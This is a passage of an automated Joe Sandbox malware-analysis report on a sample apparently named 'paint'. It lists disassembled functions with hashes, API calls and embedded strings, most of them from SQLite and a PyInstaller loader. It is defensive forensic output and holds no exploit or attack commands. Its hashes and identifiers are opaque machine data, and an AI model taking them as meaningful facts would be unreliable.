                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                                                • API String ID: 0-3733955532
                                                                                                                                                                                                                                                                • Opcode ID: 671a89d222fdc13ea8000fc10d6abe48d02ce2d833756ace11273f028f8a07dc
                                                                                                                                                                                                                                                                • Instruction ID: 4dbc3758a3ca3a2c4bc661adab614fef262558e75f66ea1ac5a05c1410cbd1aa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 671a89d222fdc13ea8000fc10d6abe48d02ce2d833756ace11273f028f8a07dc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC028362B0AA8385EB158F15A464BB96361FF4AB85F444235EA6E067F9DF3CE504D300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFB09B253
                                                                                                                                                                                                                                                                • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFB09B334
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                                                                • API String ID: 4225454184-875588658
                                                                                                                                                                                                                                                                • Opcode ID: 18b3c992eb28e1a0aff938a211f6eba9336fe8c1eb93773f796c937e9d9e6dad
                                                                                                                                                                                                                                                                • Instruction ID: 9cd6f0cabc40237780bbba73cc6cf23b4a977a37f7ba428500c2129dc33b1125
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18b3c992eb28e1a0aff938a211f6eba9336fe8c1eb93773f796c937e9d9e6dad
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDE19226F0A65B89FB20CF64D460BBC27A1AB4679CF404136DA2E56BEDDE3CE445D340
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Cannot add a column with non-constant default, xrefs: 00007FFDFB0B79F9
                                                                                                                                                                                                                                                                • cannot add a STORED column, xrefs: 00007FFDFB0B7B02
                                                                                                                                                                                                                                                                • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFDFB0B797D
                                                                                                                                                                                                                                                                • Cannot add a PRIMARY KEY column, xrefs: 00007FFDFB0B7911
                                                                                                                                                                                                                                                                • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFDFB0B7987, 00007FFDFB0B7A03, 00007FFDFB0B7B11
                                                                                                                                                                                                                                                                • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFDFB0B7BA4
                                                                                                                                                                                                                                                                • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFDFB0B799F
                                                                                                                                                                                                                                                                • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFDFB0B7CEC
                                                                                                                                                                                                                                                                • Cannot add a UNIQUE column, xrefs: 00007FFDFB0B792C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                                                • API String ID: 4225454184-200680935
                                                                                                                                                                                                                                                                • Opcode ID: fd0e222e7faf09e0b063a0f2a82046eceadd766e45b64b1c38adeb6e4bde358b
                                                                                                                                                                                                                                                                • Instruction ID: 3899861e10940651e09c87a7a19df570d5cdecbf2b4ce3d23e6f2779e7e192a1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd0e222e7faf09e0b063a0f2a82046eceadd766e45b64b1c38adeb6e4bde358b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3CE19122B0AA8385EB658B159564BB927A1FB42BC8F048035CE6D477FDDF3CE545DB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                • Instruction ID: 6e1f8c7775155a737b8344f35aab00d046834222019df077205ccdbfd13550fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6510626604BA186D7249F22E4185BAB7A1FB98B61F004125EBDF83795EF3DD045DB10
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                                • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                                • Instruction ID: a5614849f8203546173ac6eec0ca5a0c0e075c1f7f9dab151b241fa8f974548d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4921E525B09A42D2E7454BBAA854579A255FF8AB92F884130DF3FC33D4FE2DD5858300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013426793.00007FFDFAA01000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAA00000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013391762.00007FFDFAA00000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAA62000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAAAE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAAB2000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAAB7000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAB0F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAB14000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAB17000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013772305.00007FFDFAB18000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013801898.00007FFDFAB19000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaa00000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                                • Opcode ID: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                                                                • Instruction ID: f528d7b5d5b0b9b77ab331c8d1e6668383bf52ed2284824a3077940b40a6682d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F817B20F0876346FB6C9B659461A7A3A94AF45780F9CC0B5DA6C472DEDE2CE94F8700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                • Instruction ID: 6f3795f9fda3e88f4eea34e79635956c3c1b7d4a4efaf9c6df4ed329367011db
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4212C276E0C143A6FB249A14E1542B976A1FB527D4FC44175E6AB87BC4FF3EE9808B00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                • Instruction ID: 205dc92ebd49949720dff3d89ade4fbf1a4ee3d0763243f892527f65f18e6c97
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1812B772E0C143A6FB209A15E0546797261FB82754FE84875D6ABC77C4EF7EE880CB14
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                                                • API String ID: 4225454184-2846519077
                                                                                                                                                                                                                                                                • Opcode ID: 3bafca03e1c0bf546381a32de105ce3aa4ad83823cff43ea0a1251520faa542c
                                                                                                                                                                                                                                                                • Instruction ID: c31ad146f33e859fd83ded27da3d9cd6b1feb9295d4d40e616bef7aa0c108fdb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bafca03e1c0bf546381a32de105ce3aa4ad83823cff43ea0a1251520faa542c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D02A2A2B0A78386E714EF159420BB93791FB46B88F404235DE6D47BE9DF3CE5519700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: new[]
                                                                                                                                                                                                                                                                • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                                                • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                                                • Opcode ID: e46a12ec1441f981d07c3f2a607ca8bc3bdc7db8ee7e1141140c55af0bd5dc97
                                                                                                                                                                                                                                                                • Instruction ID: dcb732ced66b309ad985e4c773f254859466383051521f4be7f02f550ca507a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e46a12ec1441f981d07c3f2a607ca8bc3bdc7db8ee7e1141140c55af0bd5dc97
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25514C12F0E38345F7159B61A431EBAA692EF46B88F484132DD6D433EEDE3CE5459344
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                • Opcode ID: 9b0fbd36dafbdab35367861db69707bdc9953610152ace5b45e374509e78701a
                                                                                                                                                                                                                                                                • Instruction ID: f3053970c7765fdc275e4e6a1a0df4409fb8cdfbd2eb3e872ea777182c681ac3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b0fbd36dafbdab35367861db69707bdc9953610152ace5b45e374509e78701a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE419425A09653B2EB10DB52A8006B9A396FF46BC4FC44831EE2E877C5EF3EE5458740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD88F4
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD88FA
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD893C
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8A20: GetEnvironmentVariableW.KERNEL32(00007FF6F0BD388E), ref: 00007FF6F0BD8A57
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6F0BD8A79
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BE82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE82C1
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD2810: MessageBoxW.USER32 ref: 00007FF6F0BD28EA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                                • Opcode ID: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
                                                                                                                                                                                                                                                                • Instruction ID: e0653768494b0e64a5ac929e36bcf9a97ad7fbaa9d53d81d11b97cf1b5545436
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5541A311A1A64370FB20AB61A8652B95392AF87BC5FC01131ED2FC77D6FE3EE5059340
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
